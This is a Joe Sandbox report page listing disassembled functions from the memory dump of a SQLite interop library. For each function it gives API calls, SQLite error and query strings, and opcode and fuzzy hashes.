                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C478AA0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s at line %d of [%.10s]$%z - %s$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption$drop column$error in %s %s after %s: %s$malformed database schema (%s)$rename
                                                                                      • API String ID: 0-4020939587
                                                                                      • Opcode ID: e2bc93f9ec3353710043049c75db871543714f8df9bf91c96b5b7b852f696380
                                                                                      • Instruction ID: 6817546432b4810363f6846166ec4c29e3f1a8ef7dec69ad0d8d665dbc677586
                                                                                      • Opcode Fuzzy Hash: e2bc93f9ec3353710043049c75db871543714f8df9bf91c96b5b7b852f696380
                                                                                      • Instruction Fuzzy Hash: 792190727002406FE725DB28DC41FA6BBE4DB81259F04486EF819ABB81D765B845CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42E8E0 Relevance: 15.4, APIs: 10, Instructions: 439COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C42F020: SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000001,00000000), ref: 6C42F06D
                                                                                        • Part of subcall function 6C42F020: SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,00000001,00000000), ref: 6C42F073
                                                                                        • Part of subcall function 6C42F020: SIbc9b0b73a965892b.SQLITE.INTEROP(?,00000000), ref: 6C42F082
                                                                                        • Part of subcall function 6C42F020: SId99ac2a61d035e11.SQLITE.INTEROP(?,00000000,?,00000000), ref: 6C42F08D
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,00000000,00000000), ref: 6C42EA1F
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C42EA2F
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C42EA3F
                                                                                      • __allrem.LIBCMT ref: 6C42EAB2
                                                                                      • __allrem.LIBCMT ref: 6C42EACD
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?), ref: 6C42EB80
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?), ref: 6C42EB86
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,00000000), ref: 6C42EB90
                                                                                        • Part of subcall function 6C430100: SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,00000000,00000248), ref: 6C430161
                                                                                        • Part of subcall function 6C430100: SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,?,?,?,00000001,?,?,00000000,00000248), ref: 6C43016E
                                                                                        • Part of subcall function 6C430100: SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,?,?,?,00000001,?,?,00000000,00000248), ref: 6C430174
                                                                                        • Part of subcall function 6C430100: SIf8364af380546f2d.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000248), ref: 6C430188
                                                                                        • Part of subcall function 6C430100: SIf8364af380546f2d.SQLITE.INTEROP(?,00000002,?,00000001,?,?,?,?,?,?,?,?,?,00000000,00000248), ref: 6C430198
                                                                                        • Part of subcall function 6C430100: SId99ac2a61d035e11.SQLITE.INTEROP(?,00000004), ref: 6C4301F1
                                                                                        • Part of subcall function 6C430100: SIbc9b0b73a965892b.SQLITE.INTEROP(?,00000004,?,00000004), ref: 6C4301FF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,00000000,00000000), ref: 6C42EE74
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,00000000,00000000), ref: 6C42EE80
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.$If8364af380546f2d.$I950480ab972e108d.Ibc9b0b73a965892b.Ibff6307869d58daf.Id99ac2a61d035e11.Ifc350ae509dc2b53.__allrem$I1c7a7970970b9619.
                                                                                      • String ID:
                                                                                      • API String ID: 2143637977-0
                                                                                      • Opcode ID: a3b387daf65668c579c4b04e66b9a0cd08201742e0a0dd8404d01c71805876a4
                                                                                      • Instruction ID: 678eb7e1d8314fd3fbb60992ba164f55ae0b35a6ec4341e2ebb244fcb37a73e4
                                                                                      • Opcode Fuzzy Hash: a3b387daf65668c579c4b04e66b9a0cd08201742e0a0dd8404d01c71805876a4
                                                                                      • Instruction Fuzzy Hash: 42F168706083019BD700CF25C8C1F5BBBE5AFC834AF044A2DF89996751EB79E9498BD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E60C0 Relevance: 15.2, APIs: 10, Instructions: 174COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIa0f9dd1158cbfb0c.SQLITE.INTEROP(00000004), ref: 6C3E60DF
                                                                                      • SI863e1ae0679961f5.SQLITE.INTEROP(00000004), ref: 6C3E6116
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C3E6125
                                                                                      • SIe57aa77c8884d3f9.SQLITE.INTEROP(00000004), ref: 6C3E6141
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C3E6190
                                                                                      • SI4abff63f9a080046.SQLITE.INTEROP(00000004), ref: 6C3E61AC
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(00000004), ref: 6C3E61D0
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C3E6246
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(00000004), ref: 6C3E6282
                                                                                      • SI24bb313f312e2857.SQLITE.INTEROP(?), ref: 6C3E62E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I24bb313f312e2857.$Iea8388f7613ed158.$I4abff63f9a080046.I863e1ae0679961f5.Ia0f9dd1158cbfb0c.Ie57aa77c8884d3f9.
                                                                                      • String ID:
                                                                                      • API String ID: 2224000595-0
                                                                                      • Opcode ID: 89fd052815d0c5bb4fae99283ce5b5a784b134352795374b284fb9e72cf6e14c
                                                                                      • Instruction ID: 20ba3b837a02160238cb2bcbf20bb577854089b12dcf43e57fb13733aa38d031
                                                                                      • Opcode Fuzzy Hash: 89fd052815d0c5bb4fae99283ce5b5a784b134352795374b284fb9e72cf6e14c
                                                                                      • Instruction Fuzzy Hash: 01715CB4E006198BCB08DFA8D990AEEB7B5BF49308F10453ED915AB741E731A945CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D8B88 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 6C3D8B9C
                                                                                        • Part of subcall function 6C3D7AF4: HeapFree.KERNEL32(00000000,00000000,?,6C3D7761,00000001,00000001), ref: 6C3D7B0A
                                                                                        • Part of subcall function 6C3D7AF4: GetLastError.KERNEL32(78A8D6F6,?,6C3D7761,00000001,00000001), ref: 6C3D7B1C
                                                                                      • _free.LIBCMT ref: 6C3D8BA8
                                                                                      • _free.LIBCMT ref: 6C3D8BB3
                                                                                      • _free.LIBCMT ref: 6C3D8BBE
                                                                                      • _free.LIBCMT ref: 6C3D8BC9
                                                                                      • _free.LIBCMT ref: 6C3D8BD4
                                                                                      • _free.LIBCMT ref: 6C3D8BDF
                                                                                      • _free.LIBCMT ref: 6C3D8BEA
                                                                                      • _free.LIBCMT ref: 6C3D8BF5
                                                                                      • _free.LIBCMT ref: 6C3D8C03
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 35da49075d3cd82bcd045ae150747675a7b626c42a759fde6910807eaf9a109c
                                                                                      • Instruction ID: 32b904a5265f924e6db4a5153efced9a99ec560612470b025728f4257c1938a9
                                                                                      • Opcode Fuzzy Hash: 35da49075d3cd82bcd045ae150747675a7b626c42a759fde6910807eaf9a109c
                                                                                      • Instruction Fuzzy Hash: 4811A476100189AFCF01DF98C881CD97BA5EF05254B5240E5BA488FB25DB71EF55DF82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4E47F0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 296COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI8a3a9f59ab5f24ee.SQLITE.INTEROP(?), ref: 6C4E49D8
                                                                                      • SI8a3a9f59ab5f24ee.SQLITE.INTEROP(?), ref: 6C4E49E6
                                                                                      • SI8a3a9f59ab5f24ee.SQLITE.INTEROP(?), ref: 6C4E49F4
                                                                                      • SI8a3a9f59ab5f24ee.SQLITE.INTEROP(?), ref: 6C4E4A02
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005828,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4E4BB2
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4E4BAB
                                                                                      • misuse, xrefs: 6C4E4BA6
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4E4B9C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I8a3a9f59ab5f24ee.$I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 870602704-1203237178
                                                                                      • Opcode ID: ffbba15ae9aee07f20157abdf4b35d0df11a2a988d42837ebdd68466970d7cb4
                                                                                      • Instruction ID: 8c5a10cb0de2b996f347599775e019ddccf2c3b434e8f268732accc6f64d62b4
                                                                                      • Opcode Fuzzy Hash: ffbba15ae9aee07f20157abdf4b35d0df11a2a988d42837ebdd68466970d7cb4
                                                                                      • Instruction Fuzzy Hash: B2C1A875A00705CFDB10CFA4D480F9AB7F1BF8836AF22546CD82AABB41D734A945CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3EA470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C3EAE30: SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,6C3EA486), ref: 6C3EAE36
                                                                                        • Part of subcall function 6C3EAE30: SIfc350ae509dc2b53.SQLITE.INTEROP(6C3EA486,?,?,6C3EA486), ref: 6C3EAE3E
                                                                                        • Part of subcall function 6C3EAE30: SIfc350ae509dc2b53.SQLITE.INTEROP(6C3EA486,6C3EA486,?,?,6C3EA486), ref: 6C3EAE46
                                                                                        • Part of subcall function 6C3EAE30: SIfc350ae509dc2b53.SQLITE.INTEROP(?,6C3EA486), ref: 6C3EAE63
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3EA58A
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(malformed JSON), ref: 6C3EA597
                                                                                      • SIea8388f7613ed158.SQLITE.INTEROP(?), ref: 6C3EA612
                                                                                      • SI6e539204336d5b4b.SQLITE.INTEROP(-00000001), ref: 6C3EA626
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3EA673
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(JSON path error near '%q',00000000), ref: 6C3EA681
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I1c7a7970970b9619.$I6e539204336d5b4b.Iea8388f7613ed158.
                                                                                      • String ID: JSON path error near '%q'$malformed JSON
                                                                                      • API String ID: 1516501314-560895927
                                                                                      • Opcode ID: fb9ddd7616c255fc296614361dcb68e2a5bd6af581ce921fd357aa044fe1834d
                                                                                      • Instruction ID: e3eb4a264669597d7d4719ec0366fb626371894b5a67e39fecc048934ada9614
                                                                                      • Opcode Fuzzy Hash: fb9ddd7616c255fc296614361dcb68e2a5bd6af581ce921fd357aa044fe1834d
                                                                                      • Instruction Fuzzy Hash: 2591E7716042108BD714CF29D880B66BBF5EF8831CF14856ED899C7B41E736E95ACF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41C780 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 274COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END),main,?,6C417CFA,00000000,50D78B28,8BE8CE8B,8B000013,6C417D06,?,?,6C417CFA), ref: 6C41C7B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: AND $ FROM $ IS ?$ WHERE $SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END)$main$sqlite_stat1
                                                                                      • API String ID: 962285590-4139131707
                                                                                      • Opcode ID: 47e62839a87fd8395888b2cf88c7bef87fefa1bca0ea9859326789fe143b5beb
                                                                                      • Instruction ID: a395bef58a61b710f877ff533981db46af983fec62269b2da2872c01cad25d6c
                                                                                      • Opcode Fuzzy Hash: 47e62839a87fd8395888b2cf88c7bef87fefa1bca0ea9859326789fe143b5beb
                                                                                      • Instruction Fuzzy Hash: 1BA1A0B5E042199BCF00DF99CC80EEEB7B5FF49319F148169D855A7B41E734AA05CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43EF50 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 239COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
                                                                                      • API String ID: 0-3496276579
                                                                                      • Opcode ID: cfcf5a5c3832995c94778e2b5b4d861a9a57b8ad3a1591cbd2ed00e33b913e01
                                                                                      • Instruction ID: 1efa5f2dd137cff9b93b53e14fd7b0da1e321048683f44a9dbd69a8fc66cd00c
                                                                                      • Opcode Fuzzy Hash: cfcf5a5c3832995c94778e2b5b4d861a9a57b8ad3a1591cbd2ed00e33b913e01
                                                                                      • Instruction Fuzzy Hash: 0681D271A053119FEB10CF1AD880F5AB7F5AFC8319F14496DE8598BB40D736E8498BD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C498E40 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,00000000,000000FF,000000FF), ref: 6C499087
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,000000FF,000000FF), ref: 6C49908D
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001AE3F,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4990B1
                                                                                      • SI633e1c91fb9a8aa1.SQLITE.INTEROP(?,00000000), ref: 6C4990DF
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4990AA
                                                                                      • database corruption, xrefs: 6C4990A5
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C49909B
                                                                                      • %.*s%s, xrefs: 6C49906D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I633e1c91fb9a8aa1.I9196a02c851acbfb.I950480ab972e108d.Ifc350ae509dc2b53.
                                                                                      • String ID: %.*s%s$%s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 621641649-792437485
                                                                                      • Opcode ID: 33c2b01f342bfaac04d8eb19e772d10e6b3773707fcb5fca480eacac72c7b57b
                                                                                      • Instruction ID: b6e157e75a5d7ae6746c89174c49a14407990c37df8d414286e291d0710bda85
                                                                                      • Opcode Fuzzy Hash: 33c2b01f342bfaac04d8eb19e772d10e6b3773707fcb5fca480eacac72c7b57b
                                                                                      • Instruction Fuzzy Hash: D481B3716083218FD710CF28C490F6ABBF1BF89318F15465EE8699BB52D732E845CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E8B90 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 190COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3E8BF2
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3E8BFD
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C3E8C06
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3E8C5C
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C3E8C67
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000), ref: 6C3E8C70
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: out of memory$unrecognized character
                                                                                      • API String ID: 223094752-3687618476
                                                                                      • Opcode ID: 89562d5e698e3d5bab888f9fe02f650e7a2e56e4b6913cbf9ab163eaa2d9069a
                                                                                      • Instruction ID: ddad0c45c8585727f0c86200cf89f748212e6106eaaefb9391e5b8ce514484e5
                                                                                      • Opcode Fuzzy Hash: 89562d5e698e3d5bab888f9fe02f650e7a2e56e4b6913cbf9ab163eaa2d9069a
                                                                                      • Instruction Fuzzy Hash: 34517B71F007245BE7218E2D9841BA7B7D1DB99219F14462FD88A47F81E722E849CBD3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C422C20 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C423010: SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000,00000000,?,?,+Bl,00000000,00000000,?,?,?,?,6C422B09,?,00000001), ref: 6C42305E
                                                                                        • Part of subcall function 6C423010: SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,00000000,00000000,?,?,+Bl,00000000,00000000,?,?,?,?,6C422B09,?), ref: 6C423066
                                                                                        • Part of subcall function 6C423010: SId99ac2a61d035e11.SQLITE.INTEROP(?,00000000,?,?,?,?,+Bl,00000000,00000000,?,?,?,?,6C422B09,?,00000001), ref: 6C423078
                                                                                        • Part of subcall function 6C423010: SIbc9b0b73a965892b.SQLITE.INTEROP(?,00000000,?,00000000,?,?,?,?,+Bl,00000000,00000000,?,?,?,?,6C422B09), ref: 6C423084
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,00000000,?,?,?,?,6C422B09,?,00000001,?), ref: 6C422C7B
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,00000000,?,?,?,?,6C422B09,?), ref: 6C422CB8
                                                                                        • Part of subcall function 6C423130: SI1c7a7970970b9619.SQLITE.INTEROP(%z%s%z,?,6C4F8F34,00000000,?,?,?,?,?,?,?,6C422B1F,?), ref: 6C423170
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.$I1c7a7970970b9619.I46481015c7f49c68.I9c6d7cd7b7d38055.Ibc9b0b73a965892b.Id99ac2a61d035e11.
                                                                                      • String ID: +Bl$Node %lld is too small (%d bytes)$Node %lld is too small for cell count of %d (%d bytes)$Rtree depth out of range (%d)
                                                                                      • API String ID: 2351825483-2391329318
                                                                                      • Opcode ID: 451c64d322b3c064dfae01f1bf1705ef626072bd94e3986b26f3857b41eac4e8
